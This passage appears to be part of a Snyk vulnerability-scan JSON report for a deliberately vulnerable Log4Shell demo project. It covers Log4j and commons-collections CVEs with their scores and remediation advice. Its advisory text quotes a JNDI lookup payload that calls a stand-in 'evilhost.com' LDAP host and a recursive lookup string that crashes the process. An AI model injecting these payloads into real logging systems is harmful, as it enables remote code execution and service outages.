Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", + "epssDetails": { + "percentile": "0.99999", + "probability": "0.97556", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44228" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-jfh8-c2jp-5v3q" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-10T10:08:46.155884Z", + "functions_new": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.lookup.JndiLookup", + "functionName": "lookup" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-12-10T10:02:55Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-10T10:10:01Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.500242Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.16.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + "2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + } + ], + "ok": false, + "dependencyCount": 2, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "4 vulnerable dependency paths", + "remediation": { + "unresolved": [], + "upgrade": { + "org.apache.logging.log4j:log4j-core@2.14.1": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.14.1", + "org.apache.logging.log4j:log4j-core@2.14.1", + "org.apache.logging.log4j:log4j-core@2.14.1", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 4, + "projectName": "io.snyk:log4shell-client", + "foundProjectCount": 7, + "displayTargetFile": "log4shell-goof/log4shell-client/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + 